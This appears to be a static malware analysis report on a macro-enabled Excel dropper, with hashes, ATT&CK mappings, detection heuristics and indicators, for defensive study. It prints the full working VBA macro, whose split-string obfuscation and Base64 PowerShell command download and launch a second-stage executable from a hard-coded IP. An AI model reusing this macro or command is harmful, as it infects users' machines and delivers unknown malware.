Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9f8a480fdb31d5a2…

MALICIOUS

Office (OOXML)

102.9 KB Created: 2021-08-19 14:03:52 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-10-16
MD5: 760cd667b976aa71bf9bf097f6d292d2 SHA-1: 12b207bf0e0c04474732f8e2eeb3bf1bcc4da08b SHA-256: 9f8a480fdb31d5a238b55885ce2e9e9e3c827624b261d35f5714d1ac0770c0bb
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1059.003 Windows Command Shell (the PowerShell launcher is staged in a dropped .bat file run via Shell()) T1105 Ingress Tool Transfer (WebClient.DownloadFile of a second-stage .exe) T1027 Obfuscated Files or Information (split string literals, -EncodedCommand)

The sample is an Excel workbook whose VBA project runs its payload from the `Workbook_Activate` event handler, i.e. as soon as the document becomes the active window with macros enabled. The handler assembles, from dozens of short string literals, the command `start /MIN C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAGgAdQBlAHkAdgB6AGQAeABtAG8AagBpAGEAeQB5AGkAdQBkAGsAbgBnAG4AeQAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADEAOAAuADEAOQA1AC4AMQA0ADMALgAxADgAMwAvADYALwA3AC8ASQBNAEcAXwAwADYANwA4ADUANAAxADAAMAAwADAAMAAxADMALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA` (the string is reproduced here without the whitespace that extraction had inserted), so that neither `powershell.exe` nor `WindowsPowerShell` appears whole anywhere in the module. It then calls `ActiveWorkbook.Save`, writes the assembled line to a batch file named `Lauzwnihixafsej.bat` (a relative path, i.e. the Excel process's current directory) and executes that file through `Shell(batch, 0)` with a hidden window; the whole routine runs under `On Error Resume Next`, so failures are silent, and the batch file is never deleted. The `-enc` argument is Base64 of a UTF-16LE PowerShell script (`-EncodedCommand`; `-win 1` is `-WindowStyle Hidden`) and decodes to `$ProcName = "Nhueyvzdxmojiayyiudkngny.exe";(New-Object System.Net.WebClient).DownloadFile("hxxp://18[.]195[.]143[.]183/6/7/IMG_06785410000013.exe","$env:APPDATA\$ProcName");Start-Process ("$env:APPDATA\$ProcName")` (URL defanged). In other words the macro downloads a second-stage executable over plain HTTP from a hard-coded IP address, stores it under `%APPDATA%` as `Nhueyvzdxmojiayyiudkngny.exe`, and launches it. The split-string obfuscation, the dropped batch file, the encoded PowerShell downloader and `Start-Process` together identify the document as a downloader/dropper; the second-stage binary is not contained in this sample and is not analysed here. Host indicators: `Lauzwnihixafsej.bat` in the working directory and `%APPDATA%\Nhueyvzdxmojiayyiudkngny.exe`; network indicator: outbound HTTP to 18.195.143.183 (path `/6/7/IMG_06785410000013.exe`).

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2662 bytes
SHA-256: 81040dbcb9f2800e697f58bb5d932d7620d70cb03bb03d28433f8eb2b58ad310
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Analyst annotation: empty event handler, no behaviour. Its purpose is not
' evident from the code — possibly template residue or filler to make the
' project resemble ordinary workbook code; it plays no part in the payload.
Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)

End Sub

' Analyst annotation: empty event handler, no behaviour (see note on the
' other empty stubs in this module); not involved in the payload.
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

' Analyst annotation (comments added; every code line is byte-identical to
' the extracted sample). Auto-execute handler: Excel raises Workbook_Activate
' when this workbook becomes the active window, so the payload fires on open
' as soon as macros are enabled, with no further user interaction.
Private Sub Workbook_Activate()
' Swallow every runtime error so a failed file write or launch never
' surfaces a dialog to the user.
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String   ' declared but never referenced
Dim s As String
' Launcher line built from short fragments so that neither "WindowsPowerShell"
' nor "powershell.exe" occurs as a single literal (defeats naive keyword
' scanning). "start /MIN" launches detached and minimised via cmd.exe;
' "-win 1" is -WindowStyle Hidden; "-enc" is -EncodedCommand, i.e. Base64 of
' a UTF-16LE script.
s = s + "start /MIN C:\Windo"
s = s + "ws\System32\" + "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe"
s = s + " -win 1 -enc"
s = s + " "

' Encoded payload, 14 Base64 characters per fragment. Decoded (URL defanged):
'   $ProcName = "Nhueyvzdxmojiayyiudkngny.exe";
'   (New-Object System.Net.WebClient).DownloadFile(
'       "hxxp://18[.]195[.]143[.]183/6/7/IMG_06785410000013.exe",
'       "$env:APPDATA\$ProcName");
'   Start-Process ("$env:APPDATA\$ProcName")
' i.e. fetch a second-stage .exe over plain HTTP from a hard-coded IP, store
' it under %APPDATA% and execute it.
s = s + "JABQAHIAbwBjAE"
s = s + "4AYQBtAGUAIAA9"
s = s + "ACAAIgBOAGgAdQ"
s = s + "BlAHkAdgB6AGQA"
s = s + "eABtAG8AagBpAG"
s = s + "EAeQB5AGkAdQBk"
s = s + "AGsAbgBnAG4AeQ"
s = s + "AuAGUAeABlACIA"
s = s + "OwAoAE4AZQB3AC"
s = s + "0ATwBiAGoAZQBj"
s = s + "AHQAIABTAHkAcw"
s = s + "B0AGUAbQAuAE4A"
s = s + "ZQB0AC4AVwBlAG"
s = s + "IAQwBsAGkAZQBu"
s = s + "AHQAKQAuAEQAbw"
s = s + "B3AG4AbABvAGEA"
s = s + "ZABGAGkAbABlAC"
s = s + "gAIgBoAHQAdABw"
s = s + "ADoALwAvADEAOA"
s = s + "AuADEAOQA1AC4A"
s = s + "MQA0ADMALgAxAD"
s = s + "gAMwAvADYALwA3"
s = s + "AC8ASQBNAEcAXw"
s = s + "AwADYANwA4ADUA"
s = s + "NAAxADAAMAAwAD"
s = s + "AAMAAxADMALgBl"
s = s + "AHgAZQAiACwAIg"
s = s + "AkAGUAbgB2ADoA"
s = s + "QQBQAFAARABBAF"
s = s + "QAQQBcACQAUABy"
s = s + "AG8AYwBOAGEAbQ"
s = s + "BlACIAKQA7AFMA"
s = s + "dABhAHIAdAAtAF"
s = s + "AAcgBvAGMAZQBz"
s = s + "AHMAIAAoACIAJA"
s = s + "BlAG4AdgA6AEEA"
s = s + "UABQAEQAQQBUAE"
s = s + "EAXAAkAFAAcgBv"
s = s + "AGMATgBhAG0AZQ"
s = s + "AiACkA"


' Workbook is saved before the drop; the reason is not evident from the
' code — TODO confirm (possibly to suppress a save prompt or persist state).
ActiveWorkbook.Save
' Relative path: the batch file lands in the Excel process's current
' directory, which depends on how the workbook was opened. It is never
' deleted, so it remains on disk as a forensic artifact.
batch = "Lauzwnihixafsej.bat"
Open batch For Output As #1
    Print #1, s 
    Close #1
    ' Execute the batch file (hence cmd.exe -> powershell.exe) with window
    ' style 0 = vbHide; the return value (process id) is never used.
    i = Shell(batch, 0)

End Sub

' Analyst annotation: empty private procedure, never called from the visible
' code and with no behaviour; purpose not evident (likely filler).
Private Sub Cellss()

End Sub

' Analyst annotation: empty event handler, no behaviour; not involved in the
' payload (the only active code in this module is Workbook_Activate).
Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)

End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 6656 bytes
SHA-256: 908014540259f2e929940a154fc1e18f6e8a756f4af04db55c2bc52014ed41dd